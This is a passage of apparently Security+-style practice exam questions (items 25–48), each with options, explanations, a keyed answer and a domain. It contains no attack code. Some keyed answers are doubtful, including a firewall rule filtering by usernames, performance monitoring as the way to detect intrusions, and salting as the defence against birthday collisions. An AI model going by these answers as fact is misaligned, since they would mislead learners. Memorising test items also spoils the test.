5.0 Security Program Management and Oversight
Question 25Skipped
An organization wants to have the ability to perform security assessments and audits on a third-party vendor with whom they are negotiating a contract for the support of critical IT services. What would give the organization the ability to do so?
Due diligence form
Explanation
A due diligence form is a document used to gather information about a potential business partner or vendor. While it is essential for conducting background checks and verifying information, it does not grant the organization the explicit right to perform security assessments and audits on the vendor.
Service level agreement
Explanation
A service level agreement (SLA) is a contract that defines the level of service a vendor will provide to the organization. While an SLA may include security-related provisions, it does not specifically grant the organization the right to perform security assessments and audits on the vendor.
Non-disclosure agreement
Explanation
A non-disclosure agreement is a legal contract that protects confidential information shared between parties. While it is important for protecting sensitive information, it does not give the organization the ability to perform security assessments and audits on a third-party vendor.
Correct answer
Right-to-audit clause
Explanation
A right-to-audit clause is a contractual provision that gives the organization the explicit right to conduct security assessments and audits on a third-party vendor. This clause ensures that the organization can verify the vendor’s compliance with security standards and practices before entering into a contract for critical IT services.
Overall explanation
5.3 Explain the processes associated with third-party risk assessment and management.
The right-to-audit clause is a contractual clause that gives organizations the capability to perform security assessments and audits on the systems and practices of the vendor. The clause ensures that organizations have the right to verify that the security controls of the vendor are within compliance with the standards that have been agreed upon.
Domain
5.0 Security Program Management and Oversight
Question 26Skipped
The security team at a company noticed a user account login to the network at 1700 hours from Dar es Salaam, and within 10 minutes the same account logged in from Washington. What pattern does this login behavior most likely indicate?
The user traveled quickly from Dar es Salaam to Washington
Explanation
This choice does not provide a valid explanation for the login behavior described in the question. The rapid change in login locations from Dar es Salaam to Washington within 10 minutes is unlikely to be due to the user physically traveling between the two locations.
Correct answer
The account may be compromised
Explanation
This choice provides a valid explanation for the login behavior described in the question. The rapid change in login locations within a short time frame, especially from geographically distant locations, is a common indicator of a compromised account where unauthorized access is being attempted.
The security team were not proactive for 10 minutes
Explanation
This choice does not provide a valid explanation for the login behavior described in the question. Being proactive or not proactive does not relate to the pattern of login behavior observed by the security team.
The user is browsing in incognito mode
Explanation
This choice does not provide a valid explanation for the login behavior described in the question. Browsing in incognito mode does not explain the rapid change in login locations within a short time frame.
Overall explanation
2.4 Given a scenario, analyze indicators of malicious activity.
The login behavior pattern indicates that the account may be compromised. The scenario in this situation is an example of “impossible travel” as the user logs in from two geographically distant locations in a time frame whereby there are no existent means of transportation that the user could have used to navigate in real-time and perform the login attempts. An indication results that someone different from the legitimate user has gained access to the account.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 27Skipped
Which is the most relevant log for a security analyst trying to identify and analyze events that have occurred on a Windows server as part of an investigation of a security incident?
Database log
Explanation
The Database log contains information specific to database operations and transactions. While it may be important for investigating incidents related to database security, it is not the most relevant log for a security analyst trying to identify and analyze events that have occurred on a Windows server as part of a broader security incident investigation.
Application log
Explanation
The Application log records events related to applications running on the Windows server, such as errors, warnings, and information messages. While it may contain some relevant information for an investigation, it is not as directly related to security events as the Security log.
System log
Explanation
The System log primarily contains information about the operating system, hardware, and drivers. While it may contain some relevant information for a security incident investigation, it is not the most relevant log for identifying and analyzing security events on a Windows server.
Correct answer
Security log
Explanation
The Security log is the most relevant log for a security analyst investigating security incidents on a Windows server. It contains records of security-related events such as logon attempts, resource access, and other security policy enforcement activities. This log is crucial for identifying and analyzing security incidents.
Overall explanation
4.9 Given a scenario, use data sources to support an investigation.
The security log is most relevant for identifying and analyzing events that have occurred on a Windows server. The log is rich in security-related events such as login attempts, user privilege changes, and file modifications. audit success or failure, etc. It provides invaluable data that can help in investigating security incidents.
Domain
4.0 Security Operations
Question 28Skipped
A security researcher wants to report a vulnerability she has discovered in a widely used software application to the vendor in an ethical and responsible way. What is the best approach that may be taken?
Share the vulnerability to the public to help all users
Explanation
Sharing the vulnerability with the public without informing the vendor first can lead to widespread exploitation by malicious actors before a patch or fix is available. This can result in significant harm to users and damage to the reputation of the security researcher.
Sell details of the vulnerability in the dark web
Explanation
Selling details of the vulnerability in the dark web is illegal and unethical. It can lead to the exploitation of the vulnerability by cybercriminals for malicious purposes, putting users at risk and potentially causing significant harm.
Exploit the vulnerability to show the weakness
Explanation
Exploiting the vulnerability to demonstrate the weakness is not considered ethical or responsible. It can lead to potential harm to users of the software and may violate laws and regulations related to unauthorized access and hacking.
Correct answer
Inform the vendor through a responsible disclosure program
Explanation
Informing the vendor through a responsible disclosure program is the best approach to report a vulnerability in an ethical and responsible way. This allows the vendor to address the issue and release a patch or fix before the vulnerability is exploited by malicious actors.
Overall explanation
4.3 Explain various activities associated with vulnerability management.
The security researcher should inform the vendor through a responsible disclosure program. This will give the vendor or manufacturer sample time to address the issue and release a tested patch or fix to the vulnerability before it is publicly advertised and known,
Domain
4.0 Security Operations
Question 29Skipped
A threat post has recently revealed sophisticated cyberattacks targeting personal and financial data from highly skilled attackers with advanced techniques. What type of threat actors are they?
Unskilled attacker
Explanation
An unskilled attacker typically lacks the knowledge and expertise to carry out sophisticated cyberattacks targeting personal and financial data. They are more likely to rely on basic and easily detectable methods, making them less likely to be behind the advanced techniques mentioned in the threat post.
Correct answer
Organized crime
Explanation
Organized crime groups are known for their advanced capabilities and resources, making them capable of carrying out sophisticated cyberattacks targeting personal and financial data. They often have the motivation and financial incentive to engage in such activities.
Insider threat
Explanation
An insider threat refers to a current or former employee, contractor, or business partner who has access to an organization’s systems and data. While insider threats can pose a significant risk to personal and financial data, they may not necessarily have the advanced techniques and resources mentioned in the threat post.
Nation-state
Explanation
Nation-state actors are government-sponsored entities with advanced capabilities and resources. They have the expertise to conduct highly sophisticated cyberattacks targeting personal and financial data, often for political, economic, or strategic purposes.
Overall explanation
2.1 Compare and contrast common threat actors and motivations.
The threat actors are organized crime. The attack characteristics contain sophistication and advanced techniques associated with a drive of theft of data. When such skill is used for unethical purposes, it is mostly an indication of cybercriminal groups. Cybercriminals are mainly motivated by monetary gains and can perform well-coordinated and highly organized cyberattacks.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 30Skipped
Which factor should a network administrator regard to achieve optimal wireless network performance as he performs a site survey of a busy urban area known for heavy radio frequency interference from businesses and residences?
Average number of pedestrians
Explanation
The average number of pedestrians in the area may impact the overall network usage and congestion, but it is not a direct factor that affects the performance of the wireless network in terms of radio frequency interference and signal quality.
Correct answer
Proximity of the Wi-Fi networks
Explanation
The proximity of Wi-Fi networks is crucial in achieving optimal wireless network performance, especially in a busy urban area with heavy radio frequency interference. Closer networks can cause interference and signal degradation, impacting the overall performance of the wireless network.
Size of the buildings in the area
Explanation
The size of the buildings in the area can affect the propagation of wireless signals and coverage, but it is not the primary factor that a network administrator should consider to achieve optimal wireless network performance in a busy urban area with heavy radio frequency interference.
Availability of public Wi-Fi hotspots
Explanation
The availability of public Wi-Fi hotspots may contribute to the overall radio frequency interference in the area, but it is not a direct factor that a network administrator should focus on to achieve optimal wireless network performance during a site survey.
Overall explanation
4.1 Given a scenario, apply common security techniques to computing resources.
The network administrator should regard the proximity of the Wi-Fi networks to obtain optimal wireless network performance. Overlapping channels and the heavy radio frequency interference from businesses and residences can impact the performance of the Wi-Fi network therefore it is essential that an evaluation of surrounding networks is performed.
Domain
4.0 Security Operations
Question 31Skipped
A cloud service provider uses password hashes to store their client’s credentials in the database and not plain text. Which of the below statements on hashing is correct?
Correct answer
Hashing makes a fixed-length and hard-to-reverse string of characters from a password
Explanation
This statement is correct. Hashing takes a password and converts it into a fixed-length string of characters, making it difficult to reverse engineer the original password. This process is used to securely store passwords in databases without exposing the actual password values.
Hashing allows passwords to be encrypted and decrypted symmetrically
Explanation
Hashing and encryption are two different processes. Hashing is not designed for encryption and decryption of passwords. Encryption is reversible, while hashing is irreversible and used for password storage and verification.
Hashing is reversible to allow passwords to be recovered when lost
Explanation
Hashing is a one-way function, meaning it is not reversible. Once a password is hashed, it cannot be converted back to its original plain text form. This is done for security purposes to protect user credentials in case of a data breach.
Hashing compresses and reduces the size of the password for quick login speed
Explanation
Hashing does not compress or reduce the size of passwords. Its primary purpose is to create a unique and fixed-length representation of the password for secure storage and comparison during authentication processes.
Overall explanation
3.3 Compare and contrast concepts and strategies to protect data.
Hashing makes a fixed-length and hard-to-reverse string of characters from a password. It is a one-way process and designed to make it computationally very difficult to retrieve the original data that created the hash. The security is enhanced for even if the hash is compromised, recovering the password is still technically a challenge.
Domain
3.0 Security Architecture
Question 32Skipped
A team of security professionals simulated a cybersecurity incident response scenario in a tabletop exercise that involved a significant data breach that exposed valuable information. What is the fundamental reason for this exercise?
Determination of the financial impact of data breaches
Explanation
Determining the financial impact of data breaches is an important aspect of incident response, but it is not the fundamental reason for conducting a tabletop exercise. The primary goal of such exercises is to evaluate and improve the incident response process rather than focusing solely on financial implications.
Development of techniques to forecast incidents
Explanation
Developing techniques to forecast incidents is an important aspect of cybersecurity preparedness, but it is not the primary goal of a tabletop exercise focused on incident response. The main purpose of such exercises is to assess and enhance the organization’s ability to respond effectively to cybersecurity incidents, rather than predicting future incidents.
Identification of individuals responsible for the breach
Explanation
Identifying individuals responsible for the breach is a critical step in incident response, but it is not the primary objective of a tabletop exercise. The main purpose of these exercises is to assess and enhance the incident response process as a whole, rather than pinpointing blame on specific individuals.
Correct answer
Evaluation and improvement of the incident response process
Explanation
Evaluating and improving the incident response process is the fundamental reason for conducting a tabletop exercise in response to a cybersecurity incident. These exercises help organizations test their response procedures, identify weaknesses, and make necessary improvements to enhance their overall incident response capabilities.
Overall explanation
4.8 Explain appropriate incident response activities.
The fundamental reason for the tabletop exercise is the evaluation and improvement of the incident response process. The process assesses and enhances the preparedness of the organization in responding to incidents. Teams can practice and simulate their response to security incidents and analyze the areas where there is room for improvement without the necessity of a real-life and actual incident occurring.
Domain
4.0 Security Operations
Question 33Skipped
Robert has bought a new smartphone. As he sets up his new device, he notices several applications that have already been installed on his phone which he may not ever come to use. Moreover, some of the apps need various permissions to be allowed to them. What are these apps that Robert is seeing?
Malware
Explanation
Malware is a broad term that encompasses various types of malicious software designed to harm or exploit a user’s device. While malware can be pre-installed on devices, it is not specifically related to the situation described in the question where Robert is seeing pre-installed applications that may require permissions.
Correct answer
Bloatware
Explanation
Bloatware refers to software that is pre-installed on a device by the manufacturer or carrier, often taking up unnecessary space and resources. These apps may not be useful to the user and can sometimes require various permissions to function properly.
Ransomware
Explanation
Ransomware is a type of malware that encrypts a user’s files and demands a ransom in exchange for decrypting them. It is not typically pre-installed on devices like bloatware and does not require user permissions to operate.
Adware
Explanation
Adware is software that displays advertisements on a user’s device, often in a disruptive or intrusive manner. While adware can be pre-installed on devices, it is primarily focused on generating revenue through advertising and may not necessarily require additional permissions.
Overall explanation
2.4 Given a scenario, analyze indicators of malicious activity.
The apps that Robert is seeing are called bloatware. They are applications that are pre-installed by the manufacturer onto the device but may not necessarily be needed or wanted by the user of the device once acquired. Bloatware is generally not malicious software, however, may occupy a portion of the device’s storage, affect the performance, and at times need excessive permissions to be granted to them.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 34Skipped
An IT administrator wants to enforce hardened security policies for all Windows-based computers within the corporate network. Which of the options is the best way to achieve this?
Switch on Windows Firewall
Explanation
Switching on Windows Firewall is a good security practice, but it only focuses on network security and does not cover all aspects of hardened security policies for Windows-based computers. Group policy settings provide a more comprehensive approach to enforcing security policies.
Switch on Windows Defender
Explanation
Switching on Windows Defender is important for antivirus and anti-malware protection, but it is not sufficient to enforce all hardened security policies across Windows-based computers. Group policy settings cover a wider range of security configurations and controls beyond just antivirus protection.
Correct answer
Group policy settings
Explanation
Group policy settings allow the IT administrator to centrally manage and enforce security policies across all Windows-based computers within the corporate network. This includes settings related to password complexity, account lockout policies, software restrictions, and more, making it the best way to achieve hardened security.
Physically lock the computers
Explanation
Physically locking the computers does not address the need for enforcing hardened security policies. While physical security measures are important, they do not provide the level of control and customization that group policy settings offer for implementing security policies.
Overall explanation
4.5 Given a scenario, modify enterprise capabilities to enhance security.
The best way to enforce hardened security policies for all Windows-based computers within the corporate network is group policy settings. They allow administrators to define and enforce security policies and configurations to the Windows machines that are joined to the domain controller on the network. The settings that can be configured vary from access controls, password policies, firewall rules, etc.
Domain
4.0 Security Operations
Question 35Skipped
The technology division at a logistics agency wants to ensure that it can promptly detect and mitigate unauthorized access to its critical resources due to raising concerns about the security of its internal systems and data. Which monitoring practice shall best suit their needs?
Employee attendance monitoring
Explanation
Employee attendance monitoring is used to track employee work hours, schedules, and attendance patterns. While important for workforce management and compliance purposes, it does not directly address the need to detect and mitigate unauthorized access to critical resources within the organization’s internal systems and data.
Correct answer
System performance metrics monitoring
Explanation
System performance metrics monitoring involves tracking and analyzing various performance indicators of the organization’s systems, such as CPU usage, memory utilization, network traffic, and application response times. By monitoring system performance metrics, the technology division can promptly detect anomalies, potential security breaches, or unauthorized access attempts to critical resources, making it the best monitoring practice to suit their security needs.
Data backups monitoring
Explanation
Data backups monitoring is essential for ensuring the availability and integrity of data in case of data loss or corruption. While important for data protection, it does not directly address the concerns of detecting and mitigating unauthorized access to critical resources within the organization’s internal systems and data.
Social media sites monitoring
Explanation
Social media sites monitoring is focused on tracking and analyzing social media platforms for mentions, trends, and customer interactions. While social media monitoring can be valuable for reputation management and customer engagement, it is not directly related to detecting and mitigating unauthorized access to critical resources within the organization’s internal systems and data.
Overall explanation
4.4 Explain security alerting and monitoring concepts and tools.
The logistics agency should employ system performance metrics monitoring to promptly detect and mitigate unauthorized access to its critical resources. The monitoring practice involves the analysis of system log files, network traffic, and other potential sources that may give indications of malicious activities targeting the organization.
Domain
4.0 Security Operations
Question 36Skipped
A manufacturing facility has recently suffered a security incident where an unauthorized individual managed to gain access to the industrial control systems (ICS) network that is used for the automation of the production line process. What is the major risk of such a situation?
Theft of confidential documents
Explanation
Theft of confidential documents is a potential risk in a security incident, but in the context of an unauthorized individual gaining access to industrial control systems (ICS) network, the major risk is more related to the disruption of critical processes rather than the theft of documents.
Spying on the production line
Explanation
While spying on the production line can be a concern in terms of industrial espionage, the major risk in this situation is the unauthorized disruption of critical processes that can impact the production line’s operations and potentially cause significant damage.
Correct answer
Unauthorized disruption of critical processes
Explanation
The major risk of an unauthorized individual gaining access to the industrial control systems (ICS) network is the potential for unauthorized disruption of critical processes. This disruption can lead to downtime, loss of production, and even physical damage to the manufacturing facility’s equipment.
Scanning of the network
Explanation
Scanning of the network by an unauthorized individual can lead to the discovery of vulnerabilities and potential entry points for further attacks. While network scanning is a security concern, the major risk in this scenario is the unauthorized disruption of critical processes within the industrial control systems (ICS) network.
Overall explanation
3.1 Compare and contrast security implications of different architecture models.
The major risk of the successful compromise to the industrial control systems (ICS) network is the unauthorized disruption of critical processes. If the critical processes are disrupted or compromised severe consequences may result with regards to operations and safety of the system.
Domain
3.0 Security Architecture
Question 37Skipped
What is the primary purpose of a jump server used by the network administrators?
Backup server during network outages
Explanation
A jump server is not primarily used as a backup server during network outages. Its main purpose is to provide secure administrative access to critical servers.
Correct answer
Administrative access to critical servers without directly exposing them
Explanation
The primary purpose of a jump server is to provide network administrators with administrative access to critical servers without directly exposing those servers to potential security threats. By using a jump server, administrators can securely manage and monitor the servers without compromising their security.
Redirect traffic to load balancers
Explanation
A jump server is not primarily used to redirect traffic to load balancers. Its main purpose is to act as an intermediary server that network administrators can use to access critical servers securely and manage them without direct exposure.
Central traffic monitoring location
Explanation
A jump server is not primarily used as a central traffic monitoring location. Its main purpose is to provide a secure gateway for network administrators to access critical servers without directly exposing them to potential security risks.
Overall explanation
3.2 Given a scenario, apply security principles to secure enterprise infrastructure.
A jump server is used to give administrative access to critical servers without directly exposing them. The network administrators may isolate the critical servers from the rest of the network and allow communication to them through the jump server that is kept secured from unauthorized access. Access to sensitive resources is controlled and monitored thus enhancing security.
Domain
3.0 Security Architecture
Question 38Skipped
A high-security data center has employed an access control vestibule where visitors need to first enter an enclosed area before being able to access the data center. What role does the vestibule have in terms of physical security?
It provides a waiting place for visitors
Explanation
The vestibule is not primarily designed to provide a waiting place for visitors. Its main purpose is to enhance physical security measures within the data center facility.
Correct answer
The risk of unauthorized access is minimized
Explanation
The access control vestibule plays a crucial role in physical security by minimizing the risk of unauthorized access to the data center. It acts as an additional layer of security that prevents unauthorized individuals from gaining entry into the secure area.
It increases the number of people who may go in at a time
Explanation
Increasing the number of people who may go in at a time is not the main function of the access control vestibule. The primary goal is to control and restrict access to the data center, not to accommodate more visitors simultaneously.
It plays the role of a fire escape chamber
Explanation
The vestibule does not serve as a fire escape chamber. Its main purpose is to control access to the data center and enhance physical security measures, rather than providing an escape route in case of a fire.
Overall explanation
1.2 Summarize fundamental security concepts.
The risk of unauthorized access is minimized by the access control vestibule. Visitors to the data center need to make their way across a set of two secure doors before gaining access to the data center. Social engineering attacks such as tailgating or piggybacking are prevented.
Domain
1.0 General Security Concepts
Question 39Skipped
What is the primary security concern for a corporate firm that has implemented a choose your own device (CYOD) policy that allows employees to select the mobile devices that suit them from a range of various brands and models available?
Ensuring employees are satisfied
Explanation
Ensuring employees are satisfied is important for employee morale and productivity, but it is not the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. Security of the devices and data should take precedence over employee satisfaction in this context.
Correct answer
Managing the diversity and security of the devices
Explanation
Managing the diversity and security of the devices is the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. With employees using various brands and models of mobile devices, ensuring consistent security measures, policies, and controls across all devices becomes crucial to protect against potential security threats and data breaches.
Listing the owners and models of all devices
Explanation
Listing the owners and models of all devices may be a good practice for inventory and asset management purposes, but it is not the primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. The main security concern is managing the diversity and security of the devices to protect sensitive corporate data.
Getting discounts from the manufacturers
Explanation
Getting discounts from the manufacturers is not a primary security concern for a corporate firm implementing a choose your own device (CYOD) policy. While cost savings may be a factor in device selection, the main focus should be on security implications of diverse devices being used within the organization.
Overall explanation
4.1 Given a scenario, apply common security techniques to computing resources.
The primary security concern for the corporate firm that has implemented the Choose Your Own Device (CYOD) policy is managing the diversity and security of the devices. The employees are allowed to select the mobile device of their preference from a wide range of brands and models which each have their own configuration standards and settings for ensuring security and integrity of the corporate data and systems.
Domain
4.0 Security Operations
Question 40Skipped
A security guard at a corporate office building is one day confronted with an individual trying to gain access to the premises without an access card. The individual claims to be a new hire and accidentally forgot the card inside the building. What is the best course of action the security guard should take?
Correct answer
Ask the individual to wait politely and contact a supervisor for instructions
Explanation
Asking the individual to wait politely and contacting a supervisor for instructions is the best course of action to ensure proper security protocols are followed. The supervisor can verify the individual’s identity and access rights before allowing entry into the building.
Write down the situation on a paper and discuss it with the team tomorrow
Explanation
Writing down the situation on a paper and discussing it with the team tomorrow does not address the immediate security concern of the individual trying to gain access without an access card. It is essential to handle such situations promptly and in accordance with security policies.
Allow the individual access into the building because it is only fair
Explanation
Allowing the individual access into the building without proper verification of identity and access rights can compromise the security of the premises. It is important to follow established procedures and protocols to prevent unauthorized access.
Take a picture of the individual with a smartphone and share it on the Telegram group
Explanation
Taking a picture of the individual with a smartphone and sharing it on a Telegram group is not a recommended security practice for verifying identity and access rights. It is important to follow established procedures and involve the appropriate personnel, such as a supervisor, to handle security incidents effectively.
Overall explanation
1.2 Summarize fundamental security concepts.
The security guard should ask the individual to wait politely and contact a supervisor for instructions. The guard should follow protocols and not immediately allow the individual to access the premises without their access card. Waiting for the verification from a supervisor ensures security as it is essential to verify the intentions and identity of the individual before granting exceptional access.
Domain
1.0 General Security Concepts
Question 41Skipped
A group of cybersecurity professionals are assessing the risk aligned with a cyberattack that has previously hit the company. They have projected that the attack may occur twice a year. What is the ARO?
0.2
Explanation
A value of 0.2 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once every five years, which does not align with the projection made by the cybersecurity professionals in this scenario.
0.5
Explanation
A value of 0.5 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once every two years, not twice a year as projected by the cybersecurity professionals in this scenario.
Correct answer
2
Explanation
A value of 2 for the Annualized Rate of Occurrence (ARO) aligns with the projection made by the cybersecurity professionals that the cyberattack may occur twice a year. This makes it the correct choice in this context.
1
Explanation
A value of 1 for the Annualized Rate of Occurrence (ARO) would indicate that the cyberattack is projected to occur once a year, not twice as projected by the cybersecurity professionals in this scenario.
Overall explanation
5.2 Explain elements of the risk management process.
The annualized rate of occurrence (ARO) is 2. The ARO is a measure of the expected number of times in which a specific risk event may occur within a year. Since the cybersecurity professionals have projected that the attack may occur twice a year it implies that the ARO is 2.
Domain
5.0 Security Program Management and Oversight
Question 42Skipped
What type of firewall rule should the network team at an organization implement to best ensure that only authorized employees may access the human resources database as they aim to restrict access to sensitive internal resources?
Correct answer
An inbound rule that only allows traffic from authorized usernames to the human resources database
Explanation
The correct rule is an inbound one that focuses on filtering by usernames, as this approach targets individual users and verifies their identities before granting access to the sensitive HR database. This method ensures that only employees with proper credentials can access the data, providing a more granular level of control than merely relying on IP addresses. By validating access based on usernames, the firewall directly aligns with the organization’s need to restrict access to only authorized employees, maintaining a higher level of security around sensitive information.
An outbound rule that allows traffic from the human resources database to the internal network
Explanation
An outbound rule controlling traffic from the HR database is focused on what the database can send to the internal network, which does not restrict who can access the database in the first place. This rule would not address the requirement of limiting access to the HR database to specific employees, as it only manages traffic leaving the database, not incoming requests from users trying to access it.
An inbound rule that only allows traffic from authorized IP addresses to the human resources database
Explanation
Although an inbound rule is generally the right approach, restricting access based on IP addresses is less effective than filtering by usernames. IP addresses can change, be spoofed, or be shared across multiple users, which makes this rule less secure and less aligned with the organization’s aim to control access based on specific employees. Using usernames directly provides a more robust, user-centric access control mechanism.
An outbound rule that only allows traffic from the internal network to the human resources database
Explanation
This rule is incorrect because an outbound rule typically controls traffic leaving a network or system, not inbound access. While this rule would permit data flow from the network to the HR database, it does not provide specific user-level access control. The organization’s goal is to restrict access to certain employees, which this outbound rule fails to enforce.
Overall explanation
4.5 Given a scenario, modify enterprise capabilities to enhance security.
The network team should implement an inbound rule that only allows traffic from authorized usernames to the human resources database to ensure that only authorized employees may access the database. Allowing authorized IP addresses may tend to be secure, however, sophisticated spoofing techniques or unauthorized individuals using authorized devices may eventually lead to access breaches,
Domain
4.0 Security Operations
Question 43Skipped
A real estate association is migrating its on-premises infrastructure to a cloud service provider. Considering the cloud responsibility matrix, who is responsible for the configuration of user groups, access control and security policies in the cloud environment?
Correct answer
Cloud Customer
Explanation
The Cloud Customer is responsible for configuring user groups, access control, and security policies in the cloud environment. This includes setting up user permissions, defining access levels, and implementing security measures to protect data and resources.
Cloud Service Provider
Explanation
The Cloud Service Provider is responsible for providing the infrastructure, hardware, and software components of the cloud environment. However, the configuration of user groups, access control, and security policies is typically the responsibility of the Cloud Customer.
Cloud Auditor
Explanation
The Cloud Auditor is responsible for assessing and evaluating the security controls and compliance of the cloud environment. They do not have direct responsibility for configuring user groups, access control, and security policies in the cloud environment.
Cloud Architect
Explanation
The Cloud Architect is responsible for designing and planning the overall structure and architecture of the cloud environment. While they may provide input on security best practices and recommendations, the actual configuration of user groups, access control, and security policies falls under the responsibility of the Cloud Customer.
Overall explanation
3.1 Compare and contrast security implications of different architecture models.
The cloud customer is responsible for configuring security groups, firewalls, and access control lists (ACLs) that control the flow of traffic within the cloud environment. The cloud service provider may provide the infrastructure and tools, however, it is up to the cloud customer to set the security measures and define who should have access to the data.
Domain
3.0 Security Architecture
Question 44Skipped
How can scripting help a system administrator comply with security policies by disabling user accounts of employees who have left the organization?
Regulating security awareness to employees about the disabling processes
Explanation
Regulating security awareness to employees about the disabling processes is important for overall security hygiene, but it does not directly address the need for automated account disabling. While educating employees on security practices is crucial, scripting provides a more efficient and reliable solution for enforcing security policies.
Manually disabling the user accounts through a console interface
Explanation
Manually disabling user accounts through a console interface is a time-consuming and error-prone process for a system administrator. It does not ensure consistency in enforcing security policies and increases the likelihood of human error, potentially leading to security vulnerabilities.
Segregating the network of working employees and departed staff
Explanation
Segregating the network of working employees and departed staff is a network security measure that can help limit access to resources, but it does not specifically address the task of disabling user accounts. Scripting for automatic account disabling is a more direct and effective approach to ensuring compliance with security policies regarding user account management.
Correct answer
Automatically disabling the departed employee’s accounts
Explanation
Automatically disabling the departed employee’s accounts through scripting allows the system administrator to efficiently and consistently enforce security policies. By automating this process, the risk of oversight or delay in disabling accounts is minimized, enhancing overall security posture.
Overall explanation
4.7 Explain the importance of automation and orchestration related to secure operations.
Automatically disabling the departed employee’s accounts can be achieved by scripting. The technique is an efficient and consistent way to manage access control and comply with security policies.
Domain
4.0 Security Operations
Question 45Skipped
What is the likely impact of sufficient funding to a group of individuals with advanced technical hacking skills actively targeting financial sectors with cyberattacks?
Inability to perform zero-day attacks
Explanation
Sufficient funding would actually increase the likelihood of individuals with advanced technical hacking skills being able to perform zero-day attacks. With resources at their disposal, they would have the ability to discover and exploit previously unknown vulnerabilities before they are patched, making zero-day attacks more feasible.
Lack of motivation to launch attacks
Explanation
Sufficient funding would likely increase the motivation of individuals with advanced technical hacking skills to launch cyberattacks, rather than decrease it. With more resources at their disposal, they may feel empowered to carry out attacks more aggressively.
Reliance on open-source software for attacks
Explanation
Individuals with advanced technical hacking skills actively targeting financial sectors would not likely rely on open-source software for their attacks if they have sufficient funding. They would have the means to acquire and develop custom tools and malware tailored to their specific targets.
Correct answer
Ability to deploy sophisticated hacking tools
Explanation
With sufficient funding, individuals with advanced technical hacking skills would have the ability to invest in and deploy sophisticated hacking tools and techniques. This would enable them to conduct more advanced and potentially more damaging cyberattacks on financial sectors.
Overall explanation
2.1 Compare and contrast common threat actors and motivations.
The likely impact of sufficient funding to a group of individuals with advanced technical hacking skills is the ability to deploy sophisticated hacking tools. Since the attackers have already taken the lead with their expansive skill set, it only means that substantial funding shall give them the edge they need to perform highly sophisticated attacks using the proper tools.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 46Skipped
What should be considered by a technology firm to address security concerns during the acquisition process of new software to upgrade its network management capabilities?
Negotiations for the best price of the software
Explanation
Negotiating for the best price of the software is important for cost-effectiveness, but it does not directly address security concerns during the acquisition process. Security should be a top priority when acquiring new software to ensure the protection of the firm’s network and data assets.
Security evaluations of the vendor to accelerate the procurement process
Explanation
Security evaluations of the vendor may provide insights into the vendor’s security practices and track record, but it does not directly address the security concerns related to the specific software being acquired. The focus should be on evaluating the security features and vulnerabilities of the software itself, rather than solely relying on the vendor’s security reputation.
Compatibility of the software with the existing hardware
Explanation
While compatibility with existing hardware is important for the successful implementation of new software, it is not directly related to addressing security concerns during the acquisition process. Security considerations should focus on the software’s ability to protect the network and data, rather than its compatibility with hardware.
Correct answer
Documentation on the security features and vulnerabilities of the software
Explanation
Documentation on the security features and vulnerabilities of the software is crucial for a technology firm to assess the potential risks and benefits of integrating the new software into their network management capabilities. Understanding the security features will help in determining if the software aligns with the firm’s security requirements, while knowledge of vulnerabilities will allow for proactive measures to mitigate potential threats.
Overall explanation
4.2 Explain the security implications of proper hardware, software, and data asset management.
The technology firm should consider documentation on the security features and vulnerabilities of the software to address security concerns during the acquisition process. This will ensure the organization manages the potential risks associated with the software acquisition effectively and makes informed decisions about the software they are acquiring.
Domain
4.0 Security Operations
Question 47Skipped
A government agency that deals with data on the levels of national security has implemented an information classification system. Why is the classification system essential for security?
Allows granular views of the information
Explanation
While a classification system may allow for granular views of information, the primary purpose of the system is to categorize data based on its sensitivity and apply appropriate security controls. Granular views may be a benefit of the classification system, but the main goal is to ensure that sensitive information is adequately protected.
Eliminates the need for encrypting sensitive data
Explanation
Eliminating the need for encrypting sensitive data is not a valid reason for the importance of a classification system. Encryption is a critical security measure that should be applied to sensitive information regardless of its classification level to protect it from unauthorized access.
Simplifies access control by universal assignments
Explanation
Simplifying access control by universal assignments may not be sufficient for ensuring the security of sensitive information. The classification system provides a more detailed and tailored approach to protecting data based on its sensitivity and importance.
Correct answer
Protection of information based on its sensitivity
Explanation
The classification system is essential for security because it allows for the protection of information based on its sensitivity. By categorizing data into different levels of classification, organizations can apply appropriate security measures to ensure that sensitive information is adequately protected.
Overall explanation
4.2 Explain the security implications of proper hardware, software, and data asset management.
The information classification system helps to provide protection of information based on its sensitivity. Highly sensitive information should be protected by stern and rigorous security controls, which are technically and managerially expensive to implement. Less sensitive information can have moderate security controls.
Domain
4.0 Security Operations
Question 48Skipped
A business conglomerate stores its user passwords as hashes in an enterprise database. The security team is concerned about the possibility of successful cryptographic attacks such as birthday attacks. How would an attacker break security with such an attack?
Correct answer
Discovering a collision in the hash algorithm
Explanation
Discovering a collision in the hash algorithm refers to finding two different inputs that produce the same hash output. If an attacker can find a collision, they can potentially use it to gain unauthorized access by impersonating a legitimate user.
Sniffing passwords over insecure networks
Explanation
Sniffing passwords over insecure networks involves intercepting and capturing plaintext passwords as they are transmitted over a network. While this is a valid concern for network security, it is not directly related to cryptographic attacks like birthday attacks on hashed passwords stored in a database.
Reverse engineering the hash
Explanation
Reverse engineering the hash involves attempting to deduce the original input from the hash output. If an attacker can reverse engineer the hash function used to store passwords, they may be able to determine the plaintext passwords and gain unauthorized access.
Exploiting password complexity weaknesses
Explanation
Exploiting password complexity weaknesses is a common method for attackers to gain access to user accounts. However, in the context of cryptographic attacks such as birthday attacks, the focus is on vulnerabilities within the hash algorithm itself rather than weaknesses in user passwords.
Overall explanation
2.4 Given a scenario, analyze indicators of malicious activity.
The attacker can crack passwords using a birthday attack by discovering a collision in the hash algorithm. A collision in the hashing algorithm exists if it is possible to find two inputs that are not identical which happen to produce the same hash when run through the hashing algorithm. This means that if the attacker manages to find a collision of the hash, they do not need to know the actual password that formed the hash to gain access but may rather use the input discovered from the hash collision. The attack gets its name from the birthday paradox that states that only 23 people are needed for the probability of two of them sharing the same birthday to exceed 50%. With computationally capable equipment inputs that share the same hash may be found like individuals that share the same birthday. This attack is thwarted by salting the passwords.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 49Skipped
